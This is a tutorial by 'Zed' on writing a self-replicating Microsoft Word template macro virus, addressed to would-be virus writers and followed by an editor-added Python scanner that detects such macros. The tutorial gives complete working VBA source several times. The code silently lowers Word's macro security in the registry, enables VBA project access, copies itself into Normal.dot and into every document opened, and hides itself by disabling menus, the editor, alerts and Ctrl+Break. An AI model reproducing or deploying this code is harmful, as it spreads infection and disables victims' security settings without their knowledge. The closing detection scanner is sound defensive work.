Programming a Template Macro virus in MS Word by Zed
If you are familiar with VB, VBScript, VBA or any other VB-based language, you shouldn't have much trouble understanding how macro viruses work. Before I get to the code, I will briefly explain how MS Word macro viruses work and what is wrong with import/export macro viruses.

Most MS Word macro viruses work by infecting the Normal template (usually Normal.dot) and then attaching themselves to whatever document gets opened or closed. The code lives in the document's class module, whose default name is 'ThisDocument'.

Many newbie macro virus programmers write a virus that exports its own code to a fixed directory on the system and imports it from there into other documents. For example, the virus exports its code to the C:\WINDOWS folder and imports it into other documents when they are opened or closed. The problem is that C:\WINDOWS might not exist, or nothing in it can be changed (no editing, moving, creating or deleting of files), and then the virus dies on the spot.

The alternative is a macro virus that 'string infects' other documents: the macro copies its own source lines directly from one VBA project into the other, without ever importing or exporting a file. Since it never touches the file system, this could possibly even let the virus run on a Macintosh. String-infecting macro viruses have a much better chance of survival than import/export ones.

Note that there are many ways to program a macro virus. The code can live in a Module, a Class Module, or a Template (the document's own class module). My favourite form is a Template macro virus that string infects.
Here is the basic code of a macro virus that string infects:

' -----------------------------------------------------------
Private Sub Document_Open()
On Error Resume Next
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
K1 = "HKEY_CURRENT_USER\Software\Microsoft\Office\"
K2 = Application.Version & "\Word\Security"
For RegLoop = 0 To 1
    KeyArray = Array("Level", "AccessVBOM")
    System.PrivateProfileString("", K1 & K2, KeyArray(RegLoop)) = 1&
Next RegLoop
Set DTemplate = ActiveDocument.VBProject.VBComponents(1)
Set NTemplate = NormalTemplate.VBProject.VBComponents(1)
Set DTCode = DTemplate.CodeModule
Set NTCode = NTemplate.CodeModule
If NTemplate.Name <> "MacroTest" Then
    NTCode.DeleteLines 1, NTCode.CountOfLines
    NTCode.InsertLines 1, DTCode.Lines(1, DTCode.CountOfLines)
    NTemplate.Name = "MacroTest"
End If
If DTemplate.Name <> "MacroTest" Then
    DTCode.DeleteLines 1, DTCode.CountOfLines
    DTCode.InsertLines 1, NTCode.Lines(1, NTCode.CountOfLines)
    DTemplate.Name = "MacroTest"
End If
LeftName = Left(ActiveDocument.Name, 8)
RightName = Right(ActiveDocument.Name, 1)
If LeftName = "Document" And IsNumeric(RightName) = True Then
    ActiveDocument.Saved = True
Else
    ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
End Sub
' ------------------------[Code Ends]------------------------

This macro virus does the following, in order:

1) Runs when the infected document is opened.
2) Attempts to set the MS Word macro security level to Low, so that from the next Word session on all macros run without the user's knowledge.
3) Checks whether the Normal template's code module is named 'MacroTest'. If it is not, the virus copies its code into the Normal template and renames the module to 'MacroTest'.
4) Checks whether the active document's code module is named 'MacroTest'. If it is not, the virus copies the code from the Normal template into the document and renames the module to 'MacroTest'.
5) Determines whether the document exists on the drive (an unsaved document has a name like 'Document1'). If it does, the document is saved; if not, it is marked as unchanged so Word discards it quietly.

For those who don't understand some of the code above, here are the techniques it uses, step by step.

Step 1: Disabling Word's macro virus warning
--------------------------------------------
Options.VirusProtection is the 'Macro virus protection' checkbox in Tools > Options > General of Word 97. When it is on, Word warns the user before opening a document that contains macros and offers to disable them. This is Word's own warning, not a hook used by antivirus scanners, so turning it off does nothing to a real scanner. What it does is keep Word quiet the next time an infected document is opened:

' ---------------------------------------------------------------------
Options.VirusProtection = False
' ---------------------------------------------------------------------

Word 2000 and later replaced this checkbox with the security levels described in step 4, which is why the virus attacks both.

Step 2: Stopping the Normal template prompt
-------------------------------------------
There is nothing worse for a macro virus than to let the user know it exists. If the Normal template is modified in any way, Word asks on exit whether the changes to the Normal template should be saved. Of course, we want the virus code saved into the Normal template without the user's knowledge.
We can turn this 'Save Normal prompt' off with the following line:

' ---------------------------------------------------------------------
Options.SaveNormalPrompt = False
' ---------------------------------------------------------------------

With this option off, Word saves the changes the macro virus made to the Normal template on exit without asking the user.

Step 3: Stopping the 'Convert File' prompt
------------------------------------------
The next option is easy to mistake for the thing that suppresses the 'Do you want to save the changes to Document1?' message, but it is not. Options.ConfirmConversions controls the Convert File dialog that Word shows before it opens or inserts a file that is not in Word format. Turning it off stops that dialog from appearing while the virus is handling files:

' ---------------------------------------------------------------------
Options.ConfirmConversions = False
' ---------------------------------------------------------------------

The 'save changes' message that Word shows after the virus has modified a document is handled in step 6, where the document is either saved or marked as unmodified.

Step 4: Setting MS Word macro security to Low
---------------------------------------------
MS Word 2000 and later has three macro security levels: High, Medium and Low. The default is High, which means no macro runs unless it is signed by a trusted source. Medium lets the user choose whether to enable the macros in a document. Low runs all macros, virus or not, without any warning. Most macro viruses lower the level to Low to get rid of the 'this document contains macros' dialog, so the user never learns that there is a macro in the document at all.

Word keeps the level in the registry under HKEY_CURRENT_USER\Software\Microsoft\Office\<version>\Word\Security in a value named Level (1 = Low, 2 = Medium, 3 = High). The same key holds AccessVBOM, which is the 'Trust access to Visual Basic Project' option of Word 2002 and later; unless it is 1, Word refuses the VBProject access that the infection code in step 5 depends on.

You can set both values with this code:

' ---------------------------------------------------------------------
K1 = "HKEY_CURRENT_USER\Software\Microsoft\Office\"
K2 = Application.Version & "\Word\Security"
For RegLoop = 0 To 1
    KeyArray = Array("Level", "AccessVBOM")
    System.PrivateProfileString("", K1 & K2, KeyArray(RegLoop)) = 1&
Next RegLoop
' ---------------------------------------------------------------------

System.PrivateProfileString with an empty file name reads and writes the registry instead of an .ini file, and Application.Version fills in the Office version number in the key path. The loop writes 1 into both Level (Low) and AccessVBOM (trusted). Note that Word applies the registry value when it starts, so the lowered level affects the next Word session rather than the one the macro is already running in.

Step 5: Normal template/active document infecting
-------------------------------------------------
When a macro virus infects a template, it deletes the existing code in it (if there is any) and replaces it with its own code. Here is the code that infects both the Normal template and the active document's template:

' ---------------------------------------------------------------------
Set DTemplate = ActiveDocument.VBProject.VBComponents(1)
Set NTemplate = NormalTemplate.VBProject.VBComponents(1)
Set DTCode = DTemplate.CodeModule
Set NTCode = NTemplate.CodeModule
If NTemplate.Name <> "MacroTest" Then
    NTCode.DeleteLines 1, NTCode.CountOfLines
    NTCode.InsertLines 1, DTCode.Lines(1, DTCode.CountOfLines)
    NTemplate.Name = "MacroTest"
End If
If DTemplate.Name <> "MacroTest" Then
    DTCode.DeleteLines 1, DTCode.CountOfLines
    DTCode.InsertLines 1, NTCode.Lines(1, NTCode.CountOfLines)
    DTemplate.Name = "MacroTest"
End If
' ---------------------------------------------------------------------

The code first takes the first component of each VBA project (VBComponents(1), which for a document is its ThisDocument module) and that component's CodeModule. For each of the two modules, if it is not named 'MacroTest', the code deletes whatever lines the module holds and inserts the virus's own lines, read straight out of the other module with Lines(1, CountOfLines). That is the whole 'string infection': text is copied from one code module into another and nothing is written to disk except the documents themselves.

Step 6: Saving the document
---------------------------
Saving the document that the macro virus has just infected is very important for the virus.
If the virus infects the document but does not save it, Word asks 'Do you want to save the changes to Document1?' even though the user has changed nothing, which gives the virus away. So the virus has to find out whether the document exists on the drive (an unsaved document usually has a name like 'Document1'). Here is the code:

' ---------------------------------------------------------------------
LeftName = Left(ActiveDocument.Name, 8)
RightName = Right(ActiveDocument.Name, 1)
If LeftName = "Document" And IsNumeric(RightName) = True Then
    ActiveDocument.Saved = True
Else
    ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
' ---------------------------------------------------------------------

A name that starts with 'Document' and ends in a digit means the document has never been saved; in that case the virus sets Saved = True so that Word discards the document on close without asking. Otherwise the document is saved back to its own path with SaveAs, which writes the infected VBA project into the file on disk.

So that is how a basic MS Word Template macro virus works. Here are a few more macro tips that were not covered above.

Macro Execution
---------------
Your macro virus can execute on the opening or the closing of the document. If you want it to run when the document is opened, use the following as the sub name:

' ---------------------------------------------------------------------
Private Sub Document_Open()
' ---------------------------------------------------------------------

To make the macro run when the document is closed instead, use this sub name:

' ---------------------------------------------------------------------
Private Sub Document_Close()
' ---------------------------------------------------------------------

It is also possible to have a macro virus that runs on both opening and closing. To do this, modify the 'Normal template/active document infecting' code from step 5 to something like this:

' ---------------------------------------------------------------------
Set DTemplate = ActiveDocument.VBProject.VBComponents(1)
Set NTemplate = NormalTemplate.VBProject.VBComponents(1)
Set DTCode = DTemplate.CodeModule
Set NTCode = NTemplate.CodeModule
If NTemplate.Name <> "MacroTest" Then
    NTCode.DeleteLines 1, NTCode.CountOfLines
    NTCode.InsertLines 1, DTCode.Lines(1, DTCode.CountOfLines)
    NTCode.ReplaceLine 1, "Private Sub Document_Close()"
    NTemplate.Name = "MacroTest"
End If
If DTemplate.Name <> "MacroTest" Then
    DTCode.DeleteLines 1, DTCode.CountOfLines
    DTCode.InsertLines 1, NTCode.Lines(1, NTCode.CountOfLines)
    DTCode.ReplaceLine 1, "Private Sub Document_Open()"
    DTemplate.Name = "MacroTest"
End If
' ---------------------------------------------------------------------

This has two extra lines compared with the step 5 code. ReplaceLine replaces the first line of the freshly copied code, which is the Sub header. When the code is copied into the Normal template the header becomes Private Sub Document_Close(); when it is copied from the Normal template into a document it becomes Private Sub Document_Open() again. The result is that the Normal template infects documents when they are closed, while infected documents infect the Normal template when they are opened.
Stealth technique: Disabling macro-accessible menus
---------------------------------------------------
Some macro viruses disable the command bars that let a user get at the macro code. They do this so the user cannot delete the virus from the Normal template. Here is a code sample that disables some well-known macro-related menu entries:

' ---------------------------------------------------------------------
With CommandBars("Tools")
    .Controls("Macro").Enabled = False
    .Controls("Templates and Add-Ins...").Enabled = False
    .Controls("Customize...").Enabled = False
End With
With CommandBars("View")
    .Controls("Toolbars").Enabled = False
    .Controls("Status Bar").Enabled = False
End With
With CommandBars("Macro")
    .Controls("Macros...").Enabled = False
    .Controls("Security...").Enabled = False
End With
With CommandBars("Format")
    .Controls("Style...").Enabled = False
End With
' ---------------------------------------------------------------------

Each of these is a menu entry the user would go through to reach the macro list, the security dialog, the attached templates or the customisation options. Greyed-out entries under Tools > Macro are themselves a tell-tale sign of an infected Normal template.

Self Recognition
----------------
When a macro virus infects other documents, it needs to check whether the document is already infected, so it needs some way of telling whether another document already carries its code. Here are the obvious ways of macro self recognition:

1) Template name (the name of the code module)
2) Code line (a specific string of code in the macro virus itself)
3) Count of lines (the macro virus's total number of code lines)

Most macro viruses use one of these checks right before infecting another document. I will now show how to code each of them. The self recognition check is just another version of the 'Normal template/active document infecting' code from step 5.
Here is a macro virus that uses the template name as its self recognition:

' ---------------------------------------------------------------------
Private Sub Document_Open()
On Error Resume Next
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
K1 = "HKEY_CURRENT_USER\Software\Microsoft\Office\"
K2 = Application.Version & "\Word\Security"
For RegLoop = 0 To 1
    KeyArray = Array("Level", "AccessVBOM")
    System.PrivateProfileString("", K1 & K2, KeyArray(RegLoop)) = 1&
Next RegLoop
Set DTemplate = ActiveDocument.VBProject.VBComponents(1)
Set NTemplate = NormalTemplate.VBProject.VBComponents(1)
Set DTCode = DTemplate.CodeModule
Set NTCode = NTemplate.CodeModule
If NTemplate.Name <> "Hello" Then
    NTCode.DeleteLines 1, NTCode.CountOfLines
    NTCode.InsertLines 1, DTCode.Lines(1, DTCode.CountOfLines)
    NTemplate.Name = "Hello"
End If
If DTemplate.Name <> "Hello" Then
    DTCode.DeleteLines 1, DTCode.CountOfLines
    DTCode.InsertLines 1, NTCode.Lines(1, NTCode.CountOfLines)
    DTemplate.Name = "Hello"
End If
LeftName = Left(ActiveDocument.Name, 8)
RightName = Right(ActiveDocument.Name, 1)
If LeftName = "Document" And IsNumeric(RightName) = True Then
    ActiveDocument.Saved = True
Else
    ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
End Sub
' ---------------------------------------------------------------------

This code checks whether the document's template (code module) is named 'Hello'. If it is not, the virus presumes the document is not infected, infects it, and renames the module to 'Hello'.
Here is the code of a macro virus that uses a specific code string as its self recognition:

' ---------------------------------------------------------------------
Private Sub Document_Open()
On Error Resume Next
'WordMacro by Zed
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
K1 = "HKEY_CURRENT_USER\Software\Microsoft\Office\"
K2 = Application.Version & "\Word\Security"
For RegLoop = 0 To 1
    KeyArray = Array("Level", "AccessVBOM")
    System.PrivateProfileString("", K1 & K2, KeyArray(RegLoop)) = 1&
Next RegLoop
Set DTCode = ActiveDocument.VBProject.VBComponents(1).CodeModule
Set NTCode = NormalTemplate.VBProject.VBComponents(1).CodeModule
If NTCode.Lines(3, 1) <> "'WordMacro by Zed" Then
    NTCode.DeleteLines 1, NTCode.CountOfLines
    NTCode.InsertLines 1, DTCode.Lines(1, DTCode.CountOfLines)
End If
If DTCode.Lines(3, 1) <> "'WordMacro by Zed" Then
    DTCode.DeleteLines 1, DTCode.CountOfLines
    DTCode.InsertLines 1, NTCode.Lines(1, NTCode.CountOfLines)
End If
LeftName = Left(ActiveDocument.Name, 8)
RightName = Right(ActiveDocument.Name, 1)
If LeftName = "Document" And IsNumeric(RightName) = True Then
    ActiveDocument.Saved = True
Else
    ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
End Sub
' ---------------------------------------------------------------------

This virus reads the third line of the other document's template with Lines(3, 1) (one line starting at line 3). If that line is not the comment "'WordMacro by Zed", the virus presumes the document is not infected and infects it. The marker has to sit at exactly the line the check looks at, which is why it is the third line of the virus itself.
Here is a macro virus that uses its own count of code lines as its self recognition:

' ---------------------------------------------------------------------
Private Sub Document_Open()
On Error Resume Next
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
K1 = "HKEY_CURRENT_USER\Software\Microsoft\Office\"
K2 = Application.Version & "\Word\Security"
For RegLoop = 0 To 1
    KeyArray = Array("Level", "AccessVBOM")
    System.PrivateProfileString("", K1 & K2, KeyArray(RegLoop)) = 1&
Next RegLoop
Set DTCode = ActiveDocument.VBProject.VBComponents(1).CodeModule
Set NTCode = NormalTemplate.VBProject.VBComponents(1).CodeModule
If NTCode.CountOfLines <> DTCode.CountOfLines Then
    NTCode.DeleteLines 1, NTCode.CountOfLines
    NTCode.InsertLines 1, DTCode.Lines(1, DTCode.CountOfLines)
End If
If DTCode.CountOfLines <> NTCode.CountOfLines Then
    DTCode.DeleteLines 1, DTCode.CountOfLines
    DTCode.InsertLines 1, NTCode.Lines(1, NTCode.CountOfLines)
End If
LeftName = Left(ActiveDocument.Name, 8)
RightName = Right(ActiveDocument.Name, 1)
If LeftName = "Document" And IsNumeric(RightName) = True Then
    ActiveDocument.Saved = True
Else
    ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
End Sub
' ---------------------------------------------------------------------

This virus compares the count of lines of the other document's template with its own. If the counts differ, it presumes the other template is not infected and infects it. So if the virus is 99 lines long, it checks whether the other template also has 99 lines, and if not, it copies itself in. This is the weakest of the three markers: a line count says nothing about which of the two modules actually holds the virus, and any unrelated module that happens to be the same length passes as 'already infected'.

Finally, I will explain some other stealth techniques for Template macro viruses. Here is a stealth technique that is rarely used in a macro virus.
The following line hides the Visual Basic Editor:

' ---------------------------------------------------------------------
Application.ShowVisualBasicEditor = False
' ---------------------------------------------------------------------

The Visual Basic Editor lets the user view or change the macro code, and from it the user can delete the virus from the Normal template or from other infected documents. This line does not lock the editor out for good: it only hides the editor window at the moment the code runs, and the user can bring it back with Alt+F11 or Tools > Macro > Visual Basic Editor, which is why viruses combine it with the menu disabling shown above.

Here is another technique (not really stealth) that stops the user from pressing Ctrl+Break to interrupt the running macro:

' ---------------------------------------------------------------------
Application.EnableCancelKey = wdCancelDisabled
' ---------------------------------------------------------------------

Next is the line that turns off screen updating. Screen updating is the process that redraws what is happening in MS Word. A macro virus doesn't want the user to see its background activity, so it turns screen updating off:

' ---------------------------------------------------------------------
Application.ScreenUpdating = False
' ---------------------------------------------------------------------

Another good stealth technique that some macro viruses use is to turn off the status bar. The status bar displays captions like 'Saving Doc1.doc', which would reveal some of the virus's activity. Here is the code that hides the MS Word status bar:

' ---------------------------------------------------------------------
Application.DisplayStatusBar = False
' ---------------------------------------------------------------------

Another technique a macro virus may use is to stop MS Word from displaying the messages associated with what the macro is doing while it runs. This line suppresses the alerts and error messages that the virus may cause:

' ---------------------------------------------------------------------
Application.DisplayAlerts = False
' ---------------------------------------------------------------------

Well, that's about it for this tutorial. Any questions, comments, etc., email me.
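Every technique in this tutorial leaves a literal trace in the VBA source: the security options it flips in steps 1 to 4, the VBProject and CodeModule calls of the string infection in step 5, and the UI-disabling properties of the stealth sections. The scanner below is an added example by the editor, not code from Zed's article. It takes the plain VBA text a tool such as oletools' olevba extracts from a .doc and scores it against those behaviours; the rule names, weights, threshold and the two sample macros are this example's own constructions.

```python
"""Heuristic scan of extracted Word VBA source for macro-virus behaviour.

Editor's added example. Input is plain VBA text (for instance the
output of olevba); no Word installation is needed. Rule names, weights
and the threshold are assumptions made for this example.
"""
import re

# (rule name, regex, weight).  Weights are this example's own choices.
RULES = [
    ("auto_exec",
     r"\b(?:Document_(?:Open|Close|New)|Auto(?:Open|Close|Exec|New|Exit))\b", 1),
    ("error_suppression", r"\bOn\s+Error\s+Resume\s+Next\b", 1),
    # Word 97 'Macro virus protection' switched off.
    ("virus_protection_off", r"\.VirusProtection\s*=\s*False\b", 3),
    # Registry write through PrivateProfileString("") or a reference to the
    # Word\Security key / AccessVBOM value (Level = 1 is Low).
    ("security_registry",
     r'PrivateProfileString\(\s*""|\\Word\\Security|\bAccessVBOM\b', 3),
    ("vba_project_access", r"\bVBProject\.VBComponents\b", 3),
    # Rewriting a CodeModule is the string-infection step itself.
    ("code_module_write",
     r"\.(?:InsertLines|AddFromString|DeleteLines|ReplaceLine)\b", 3),
    ("normal_template", r"\bNormalTemplate\.VBProject\b", 2),
    ("prompt_suppression",
     r"SaveNormalPrompt\s*=\s*False|DisplayAlerts\s*=\s*(?:False|wdAlertsNone)\b", 1),
    ("ui_lockout",
     r"\.Controls\(.+?\)\.Enabled\s*=\s*False|ShowVisualBasicEditor\s*=\s*False"
     r"|EnableCancelKey\s*=\s*wdCancelDisabled|DisplayStatusBar\s*=\s*False", 2),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE), w) for name, pat, w in RULES]
THRESHOLD = 6  # assumption: self-copy plus one security tweak is enough to flag


def normalize(source: str) -> str:
    """Join VBA line continuations ('_' at end of line) and squeeze runs of
    blanks so a statement split across lines still matches a pattern."""
    joined = re.sub(r"\s+_\r?\n\s*", " ", source)
    return re.sub(r"[ \t]+", " ", joined)


def scan_vba(source: str) -> dict:
    """Return the matched rule names, their weighted score and a verdict."""
    text = normalize(source)
    findings = [name for name, rx, _ in COMPILED if rx.search(text)]
    score = sum(w for name, _, w in COMPILED if name in findings)
    return {
        "findings": findings,
        "score": score,
        "verdict": "suspicious" if score >= THRESHOLD else "clean",
    }


# Constructed sample: the shape of the article's virus, with one statement
# split over a line continuation to exercise normalize().
SAMPLE_VIRUS = '''Private Sub Document_Open()
On Error Resume Next
Options.VirusProtection = _
    False
Options.SaveNormalPrompt = False
K2 = Application.Version & "\\Word\\Security"
System.PrivateProfileString("", K1 & K2, "Level") = 1&
Set NTCode = NormalTemplate.VBProject.VBComponents(1).CodeModule
NTCode.DeleteLines 1, NTCode.CountOfLines
NTCode.InsertLines 1, DTCode.Lines(1, DTCode.CountOfLines)
End Sub
'''

# Constructed sample: an ordinary auto-running macro that edits the document.
SAMPLE_BENIGN = '''Private Sub Document_Open()
On Error Resume Next
ActiveDocument.Paragraphs(1).Range.Font.Bold = True
MsgBox "Welcome"
End Sub
'''

if __name__ == "__main__":
    for label, src in (("constructed virus", SAMPLE_VIRUS), ("benign macro", SAMPLE_BENIGN)):
        r = scan_vba(src)
        print(f"{label}: {r['verdict']} (score {r['score']}) {r['findings']}")
```

The benign macro trips only the two low-weight rules (an auto-executing entry point and On Error Resume Next are common in harmless code), while the virus-shaped sample matches the security tampering, project access and module rewriting that only a self-copying macro needs. Literal matching of this kind is defeated by macros that assemble their property names from Chr() calls or string concatenation, so treat it as triage rather than proof; on a live machine the Level and AccessVBOM values under HKEY_CURRENT_USER\Software\Microsoft\Office\<version>\Word\Security are worth auditing directly, since the virus leaves them set long after the document is gone.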